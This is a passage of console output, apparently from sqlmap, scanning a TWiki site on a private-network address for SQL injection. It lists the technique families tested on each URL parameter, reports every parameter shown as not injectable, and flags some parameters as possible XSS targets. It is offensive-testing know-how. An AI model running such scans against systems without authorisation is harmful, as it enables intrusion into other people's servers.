[18:41:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:41:11] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:41:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:41:12] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:41:12] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:41:13] [INFO] testing 'Oracle AND time-based blind'
[18:41:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:41:14] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:41:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:41:25] [WARNING] URI parameter '#1*' is not injectable
[18:41:25] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 41:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiPreferences?skin=print
do you want to test this URL? [Y/n/q]
> Y
[18:41:25] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiPreferences?skin=print'
[18:41:25] [INFO] testing connection to the target URL
[18:41:26] [INFO] testing if the target URL is stable
[18:41:26] [INFO] target URL is stable
[18:41:26] [INFO] testing if GET parameter 'skin' is dynamic
[18:41:26] [INFO] confirming that GET parameter 'skin' is dynamic
[18:41:27] [INFO] GET parameter 'skin' is dynamic
[18:41:27] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[18:41:27] [INFO] testing for SQL injection on GET parameter 'skin'
[18:41:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:41:27] [INFO] heuristics detected web page charset 'ascii'
[18:41:27] [WARNING] reflective value(s) found and filtering out
[18:41:28] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:41:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:41:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:41:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:41:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:41:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:41:31] [INFO] testing 'MySQL inline queries'
[18:41:32] [INFO] testing 'PostgreSQL inline queries'
[18:41:32] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:41:32] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:41:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:41:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:41:33] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:41:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:41:35] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:41:35] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:41:36] [INFO] testing 'Oracle AND time-based blind'
[18:41:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:41:37] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:41:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:41:53] [WARNING] GET parameter 'skin' is not injectable
[18:41:53] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 42:
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiPreferences?rev1=1.48&rev2=1.47
do you want to test this URL? [Y/n/q]
> Y
[18:41:53] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiPreferences?rev1=1.48&rev2=1.47'
[18:41:53] [INFO] testing connection to the target URL
[18:41:53] [INFO] testing if the target URL is stable
[18:41:54] [INFO] target URL is stable
[18:41:54] [INFO] testing if GET parameter 'rev1' is dynamic
[18:41:54] [WARNING] GET parameter 'rev1' does not appear dynamic
[18:41:54] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[18:41:54] [INFO] heuristic (XSS) test shows that GET parameter 'rev1' might be vulnerable to XSS attacks
[18:41:54] [INFO] testing for SQL injection on GET parameter 'rev1'
[18:41:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:41:54] [WARNING] reflective value(s) found and filtering out
[18:41:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:41:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:41:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:41:57] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:41:57] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:41:58] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:41:58] [INFO] testing 'MySQL inline queries'
[18:41:58] [INFO] testing 'PostgreSQL inline queries'
[18:41:58] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:41:58] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:41:59] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:41:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:41:59] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:42:00] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:42:00] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:42:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:42:01] [INFO] testing 'Oracle AND time-based blind'
[18:42:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:42:02] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:42:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:42:14] [WARNING] GET parameter 'rev1' is not injectable
[18:42:14] [INFO] testing if GET parameter 'rev2' is dynamic
[18:42:14] [INFO] confirming that GET parameter 'rev2' is dynamic
[18:42:14] [INFO] GET parameter 'rev2' is dynamic
[18:42:14] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[18:42:14] [INFO] heuristic (XSS) test shows that GET parameter 'rev2' might be vulnerable to XSS attacks
[18:42:14] [INFO] testing for SQL injection on GET parameter 'rev2'
[18:42:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:42:15] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:42:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:42:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:42:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:42:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:42:19] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:42:19] [INFO] testing 'MySQL inline queries'
[18:42:20] [INFO] testing 'PostgreSQL inline queries'
[18:42:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:42:21] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:42:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:42:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:42:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:42:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:42:23] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:42:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:42:24] [INFO] testing 'Oracle AND time-based blind'
[18:42:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:42:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:42:37] [WARNING] GET parameter 'rev2' is not injectable
[18:42:37] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 43:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiPreferences?rev=1.47
do you want to test this URL? [Y/n/q]
> Y
[18:42:37] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiPreferences?rev=1.47'
[18:42:37] [INFO] testing connection to the target URL
[18:42:37] [INFO] testing if the target URL is stable
[18:42:38] [INFO] target URL is stable
[18:42:38] [INFO] testing if GET parameter 'rev' is dynamic
[18:42:38] [WARNING] GET parameter 'rev' does not appear dynamic
[18:42:38] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[18:42:39] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[18:42:39] [INFO] testing for SQL injection on GET parameter 'rev'
[18:42:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:42:39] [WARNING] reflective value(s) found and filtering out
[18:42:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:42:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:42:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:42:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:42:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:42:43] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:42:43] [INFO] testing 'MySQL inline queries'
[18:42:43] [INFO] testing 'PostgreSQL inline queries'
[18:42:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:42:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:42:43] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:42:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:42:44] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:42:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:42:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:42:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:42:46] [INFO] testing 'Oracle AND time-based blind'
[18:42:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:42:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:42:54] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:43:01] [WARNING] GET parameter 'rev' is not injectable
[18:43:01] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:43:01] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiPreferences?rev1=1.47&rev2=1.46'
[18:43:01] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiPreferences?rev=1.46'
URL 44:
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiPreferences?template=oopsmore&param1=1.48&param2=1.48
do you want to test this URL? [Y/n/q]
> Y
[18:43:01] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiPreferences?template=oopsmore&param1=1.48&param2=1.48'
[18:43:01] [INFO] testing connection to the target URL
[18:43:02] [INFO] testing if the target URL is stable
[18:43:03] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[18:43:03] [INFO] testing if GET parameter 'template' is dynamic
[18:43:03] [INFO] confirming that GET parameter 'template' is dynamic
[18:43:03] [INFO] GET parameter 'template' is dynamic
[18:43:03] [INFO] heuristics detected web page charset 'ascii'
[18:43:03] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[18:43:03] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[18:43:03] [INFO] testing for SQL injection on GET parameter 'template'
[18:43:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:43:03] [WARNING] reflective value(s) found and filtering out
[18:43:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:43:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:43:04] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:43:05] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:43:05] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:43:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:43:06] [INFO] testing 'MySQL inline queries'
[18:43:06] [INFO] testing 'PostgreSQL inline queries'
[18:43:06] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:43:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:43:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:43:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:43:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:43:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:43:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:43:08] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:43:08] [INFO] testing 'Oracle AND time-based blind'
[18:43:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:43:09] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:43:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:43:18] [WARNING] GET parameter 'template' is not injectable
[18:43:18] [INFO] testing if GET parameter 'param1' is dynamic
[18:43:18] [WARNING] GET parameter 'param1' does not appear dynamic
[18:43:18] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[18:43:18] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[18:43:18] [INFO] testing for SQL injection on GET parameter 'param1'
[18:43:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:43:19] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:43:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:43:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:43:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:43:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:43:22] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:43:22] [INFO] testing 'MySQL inline queries'
[18:43:22] [INFO] testing 'PostgreSQL inline queries'
[18:43:22] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:43:22] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:43:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:43:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:43:24] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:43:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:43:25] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:43:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:43:26] [INFO] testing 'Oracle AND time-based blind'
[18:43:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:43:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:43:41] [WARNING] GET parameter 'param1' is not injectable
[18:43:41] [INFO] testing if GET parameter 'param2' is dynamic
[18:43:42] [WARNING] GET parameter 'param2' does not appear dynamic
[18:43:42] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[18:43:42] [INFO] testing for SQL injection on GET parameter 'param2'
[18:43:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:43:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:43:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:43:44] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:43:44] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:43:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:43:46] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:43:46] [INFO] testing 'MySQL inline queries'
[18:43:46] [INFO] testing 'PostgreSQL inline queries'
[18:43:46] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:43:46] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:43:47] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:43:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:43:48] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:43:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:43:49] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:43:49] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:43:50] [INFO] testing 'Oracle AND time-based blind'
[18:43:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:43:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:44:06] [WARNING] GET parameter 'param2' is not injectable
[18:44:06] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 45:
GET http://192.168.1.113/twiki/bin/search/Know/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=100
do you want to test this URL? [Y/n/q]
> Y
[18:44:06] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Know/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=100'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[18:44:06] [INFO] testing connection to the target URL
[18:44:06] [INFO] testing if the target URL is stable
[18:44:07] [INFO] target URL is stable
[18:44:07] [INFO] testing if URI parameter '#1*' is dynamic
[18:44:07] [INFO] confirming that URI parameter '#1*' is dynamic
[18:44:07] [INFO] URI parameter '#1*' is dynamic
[18:44:07] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[18:44:07] [INFO] testing for SQL injection on URI parameter '#1*'
[18:44:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:44:08] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:44:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:44:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:44:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:44:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:44:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:44:10] [INFO] testing 'MySQL inline queries'
[18:44:10] [INFO] testing 'PostgreSQL inline queries'
[18:44:11] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:44:11] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:44:11] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:44:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:44:12] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:44:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:44:13] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:44:13] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:44:14] [INFO] testing 'Oracle AND time-based blind'
[18:44:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:44:14] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:44:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:44:25] [WARNING] URI parameter '#1*' is not injectable
[18:44:25] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 46:
GET http://192.168.1.113/twiki/bin/search/Know/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=200
do you want to test this URL? [Y/n/q]
> Y
[18:44:25] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Know/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=200'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[18:44:25] [INFO] testing connection to the target URL
[18:44:26] [INFO] testing if the target URL is stable
[18:44:27] [INFO] target URL is stable
[18:44:27] [INFO] testing if URI parameter '#1*' is dynamic
[18:44:27] [INFO] confirming that URI parameter '#1*' is dynamic
[18:44:27] [INFO] URI parameter '#1*' is dynamic
[18:44:27] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[18:44:27] [INFO] testing for SQL injection on URI parameter '#1*'
[18:44:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:44:28] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:44:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:44:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:44:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:44:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:44:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:44:30] [INFO] testing 'MySQL inline queries'
[18:44:30] [INFO] testing 'PostgreSQL inline queries'
[18:44:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:44:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:44:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:44:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:44:32] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:44:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:44:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:44:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:44:35] [INFO] testing 'Oracle AND time-based blind'
[18:44:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:44:35] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:44:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:44:48] [WARNING] URI parameter '#1*' is not injectable
[18:44:48] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 47:
GET http://192.168.1.113/twiki/bin/search/Know/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=400
do you want to test this URL? [Y/n/q]
> Y
[18:44:48] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Know/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=400'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[18:44:48] [INFO] testing connection to the target URL
[18:44:48] [INFO] testing if the target URL is stable
[18:44:49] [INFO] target URL is stable
[18:44:49] [INFO] testing if URI parameter '#1*' is dynamic
[18:44:49] [INFO] confirming that URI parameter '#1*' is dynamic
[18:44:49] [INFO] URI parameter '#1*' is dynamic
[18:44:49] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[18:44:49] [INFO] testing for SQL injection on URI parameter '#1*'
[18:44:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:44:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:44:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:44:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:44:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:44:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:44:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:44:52] [INFO] testing 'MySQL inline queries'
[18:44:52] [INFO] testing 'PostgreSQL inline queries'
[18:44:52] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:44:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:44:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:44:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:44:54] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:44:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:44:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:44:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:44:55] [INFO] testing 'Oracle AND time-based blind'
[18:44:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:44:56] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:45:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:45:07] [WARNING] URI parameter '#1*' is not injectable
[18:45:07] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 48:
GET http://192.168.1.113/twiki/bin/search/Know/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=800
do you want to test this URL? [Y/n/q]
> Y
[18:45:07] [INFO] testing URL 'http://192.168.1.113/twiki/bin/search/Know/?search=\.*&scope=topic&order=modified&reverse=on&regex=on&nosearch=on&limit=800'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[18:45:07] [INFO] testing connection to the target URL
[18:45:07] [INFO] testing if the target URL is stable
[18:45:08] [INFO] target URL is stable
[18:45:08] [INFO] testing if URI parameter '#1*' is dynamic
[18:45:08] [INFO] confirming that URI parameter '#1*' is dynamic
[18:45:08] [INFO] URI parameter '#1*' is dynamic
[18:45:08] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[18:45:08] [INFO] testing for SQL injection on URI parameter '#1*'
[18:45:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:45:09] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
